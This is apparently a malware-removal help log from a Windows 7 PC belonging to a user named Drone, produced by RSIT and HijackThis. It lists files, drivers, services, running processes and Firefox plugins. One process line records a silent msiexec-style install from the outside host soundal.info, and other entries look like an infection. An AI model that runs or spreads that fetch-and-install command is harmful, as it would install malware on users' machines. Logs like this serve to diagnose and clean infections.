2018-09-04 16:26:00 ----D---- C:\Users\Drone\AppData\Roaming\MPC-HC
2018-09-04 14:00:23 ----D---- C:\Windows\system32\LogFiles
2018-09-04 13:57:19 ----D---- C:\Windows\Prefetch
2018-09-03 22:07:02 ----D---- C:\Users\Drone\AppData\Roaming\PhotoScape
2018-09-03 20:28:28 ----D---- C:\Windows\rescache
2018-09-03 17:08:24 ----D---- C:\Windows\SYSWOW64\Macromed
2018-09-02 20:42:57 ----D---- C:\Windows\inf
2018-09-02 20:42:54 ----D---- C:\Windows\Minidump
2018-09-02 19:39:45 ----D---- C:\Windows\system32\config
2018-09-02 19:38:34 ----D---- C:\Windows\winsxs
2018-09-02 19:32:55 ----D---- C:\Windows\system32\catroot2
2018-09-02 19:09:26 ----D---- C:\Windows\System32
2018-09-02 19:09:26 ----A---- C:\Windows\system32\PerfStringBackup.INI
2018-09-02 19:01:32 ----D---- C:\Windows\SYSWOW64\cs-CZ
2018-09-02 19:01:32 ----D---- C:\Program Files\Internet Explorer
2018-09-02 19:01:31 ----D---- C:\Windows\SYSWOW64\en-US
2018-09-02 19:01:30 ----D---- C:\Windows\system32\drivers
2018-09-02 19:01:30 ----D---- C:\Windows\system32\cs-CZ
2018-09-02 19:01:29 ----D---- C:\Windows\system32\en-US
2018-09-02 19:01:27 ----D---- C:\Windows\AppPatch
2018-09-02 19:01:27 ----D---- C:\Program Files (x86)\Internet Explorer
2018-09-02 19:01:26 ----D---- C:\Windows\system32\Boot
2018-09-02 19:01:22 ----D---- C:\Windows\system32\DriverStore
2018-09-02 18:25:57 ----D---- C:\Windows\system32\CodeIntegrity
2018-09-01 21:44:27 ----RD---- C:\Program Files (x86)
2018-09-01 21:02:13 ----D---- C:\Users\Drone\AppData\Roaming\uTorrent
2018-09-01 21:02:12 ----D---- C:\Users\Drone\AppData\Roaming\Seznam.cz
2018-09-01 20:53:51 ----D---- C:\Program Files
2018-08-28 15:08:59 ----SD---- C:\ProgramData\Microsoft
2018-08-26 15:08:15 ----D---- C:\Users\Drone\AppData\Roaming\vlc
2018-08-23 14:22:53 ----D---- C:\Windows\system32\Tasks
2018-08-14 21:51:03 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2018-08-14 21:50:54 ----D---- C:\Windows\system32\Macromed
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Firefox
2018-08-11 14:57:07 ----D---- C:\Program Files (x86)\Common Files
2018-08-10 21:58:02 ----RSD---- C:\Windows\assembly
2018-08-06 22:57:04 ----D---- C:\Windows\{7CB0BBD3D374-4DEA-9751-2D08BC721AA7}
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 aswbidsh;aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [2018-05-24 199440]
R0 aswblog;aswblog; C:\Windows\system32\drivers\aswbloga.sys [2018-05-24 343752]
R0 aswbuniv;aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [2018-05-24 57680]
R0 aswRvrt;aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [2018-05-24 85968]
R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2018-05-24 381552]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2018-01-01 213736]
R1 aswArPot;aswArPot; C:\Windows\system32\drivers\aswArPot.sys [2018-05-24 196640]
R1 aswbidsdriver;aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [2018-05-24 227504]
R1 aswHdsKe;aswHdsKe; C:\Windows\system32\drivers\aswHdsKe.sys [2018-05-24 234560]
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [2018-05-24 111360]
R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2018-05-24 1027720]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2018-05-24 460520]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2012-01-12 514560]
R2 aswMonFlt;aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [2018-05-24 159120]
R2 aswStm;aswStm; C:\Windows\system32\drivers\aswStm.sys [2018-05-24 205976]
R2 npf;NetGroup Packet Filter Driver; C:\Windows\system32\drivers\npf.sys [2011-02-11 35344]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-10-08 12534784]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-10-08 619008]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2016-04-01 104976]
R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt64win7.sys [2009-03-01 187392]
S3 aswHwid;aswHwid; C:\Windows\system32\drivers\aswHwid.sys [2018-05-24 46968]
S3 BridgeMP;@%SystemRoot%\system32\bridgeres.dll,-1; C:\Windows\system32\DRIVERS\bridge.sys [2012-01-12 95232]
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
S3 prwntdrv;prwntdrv; \??\C:\Windows\syswow64\prwntdrv.sys [2014-10-23 15456]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2012-01-12 165888]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2012-08-23 30208]
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2018-03-21 83984]
R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-10-08 239616]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2018-05-24 317280]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2018-05-24 7620096]
S2 avast;Služba %1!s! Update (avast); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2017-04-21 107656]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2017-04-21 128648]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-08-14 335872]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2012-01-12 27648]
S3 avastm;Služba %1!s! Update (avastm); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 gusvc;Google Updater Service; C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2015-02-13 136120]
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2017-12-29 116224]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2018-08-11 194512]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2013-10-30 1255736]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2017-04-21 52856]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
-----------------EOF-----------------
Logfile of random's system information tool 1.10 (written by random/random)
Run by Drone at 2018-09-05 16:07:12
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 47 GB (20%) free of 238 GB
Total RAM: 4094 MB (57% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 16:07:24, on 5.9.2018
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18894)
Boot mode: Normal
Running processes:
C:\Windows\SysWOW64\EhYeIeLWi.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Windows\syswow64\MsiExec.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
C:\Program Files\trend micro\Drone.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkI ... id=UE12DHP
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: IEExtension.VDownloaderBHO - {7b523e7c-f096-4e36-a0cb-7efeb5c675c1} - mscoree.dll (file missing)
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: Služba %1!s! Update (avast) (avast) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Služba %1!s! Update (avastm) (avastm) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 5910 bytes
======Listing Processes======
\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
winlogon.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
atieclxx
C:\Windows\system32\svchost.exe -k NetworkService
"C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
"taskhost.exe"
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler.exe"
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler64.exe"
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
taskeng.exe {9F7464FB-F858-4C01-B903-B02E4632587B}
C:\Windows\SysWOW64\EhYeIeLWi.exe /q /i http://soundal.info/v9b320qcn586.xue
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\SearchIndexer.exe /Embedding
AvastUI.exe /nogui
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
C:\Windows\syswow64\MsiExec.exe -Embedding D9DC1851A781B7F5533C7DD50E245F0E
"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM" PriorityLow
"C:\Users\Drone\AppData\Local\Media Network Sharing\msiexec64.exe"
\??\C:\Windows\system32\conhost.exe "-19937277911490919693-933249300-908891384-1566048741-249081015458105671364535199
\??\C:\Windows\system32\conhost.exe "171234901509696851-1045070504-55454072-1365905644312556696407872644-2096392339
"C:\Windows\SysWOW64\resources.bin" "-n" "msiexec64.exe"
C:\Windows\system32\wbem\unsecapp.exe -Embedding
"C:\Windows\SysWOW64\svchost.exe"
"C:\Windows\SysWOW64\svchost.exe" --config="C:\Users\Drone\AppData\Local\Temp\[495E8E]"
\??\C:\Windows\system32\conhost.exe "-91096917611275100337083751712060422261810659854-2085465575-1573627024258217638
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe" 0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Drone\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Drone\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Drone\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fee87c24d0,0x7fee87c24e0,0x7fee87c24f0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4092 --on-initialized-event-handle=348 --parent-handle=352 /prefetch:6
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D9CF77074821AC598E5B376AE36B11EB --mojo-platform-channel-handle=1108 --ignored=" --type=renderer " /prefetch:2
"C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=93FB6E71E51720C4AFEF2E896CE3333A --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=93FB6E71E51720C4AFEF2E896CE3333A --renderer-client-id=3 --mojo-platform-channel-handle=2160 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E7BF32E2BCC4F6399669CCB8E54A04CC --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E7BF32E2BCC4F6399669CCB8E54A04CC --renderer-client-id=4 --mojo-platform-channel-handle=2592 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=960523435D3F887DE832A4404842A18B --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=960523435D3F887DE832A4404842A18B --renderer-client-id=14 --mojo-platform-channel-handle=3420 /prefetch:1
C:\Windows\system32\CompatTelRunner.exe
\??\C:\Windows\system32\conhost.exe "1512110160697033495-800213516-119467602-1064192088154836462811149822782145537507
C:\Windows\system32\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:PxDcTOQ9t0aEou5p.1
taskeng.exe {7912F5E3-0345-4546-8687-238EFA0866D6}
C:\Windows\system32\wbem\wmiprvse.exe
taskeng.exe {C5AD0D9E-7183-4887-A14D-6F6A8D5A8D06}
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=C9E947F72D9B35D51EF245BAC507C30B --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=C9E947F72D9B35D51EF245BAC507C30B --renderer-client-id=35 --mojo-platform-channel-handle=4220 /prefetch:1
C:\Windows\system32\wbem\wmiprvse.exe
"C:\Windows\system32\SearchFilterHost.exe" 0 512 516 524 65536 520
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E1A56BA9015DD51AE87C7EB2DE2A1EEC --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E1A56BA9015DD51AE87C7EB2DE2A1EEC --renderer-client-id=36 --mojo-platform-channel-handle=4004 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E8075E17D62A768FD9A6E2B5DC1ABF7D --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E8075E17D62A768FD9A6E2B5DC1ABF7D --renderer-client-id=38 --mojo-platform-channel-handle=4060 /prefetch:1
"C:\Users\Drone\Downloads\RSITx64 (1).exe"
=========Mozilla firefox=========
ProfilePath - C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283
prefs.js - "browser.search.useDBForOrder" - true
"support@vdownloader.com"=C:\Program Files\VDownloader\Addons\FireFox
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@google.com/npPicasa3,version=3.0.0]
"Description"=Picasa3 plugin
"Path"=C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.8]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.172.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\dtplugin\npDeployJava1.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.172.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\plugin2\npjp2.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
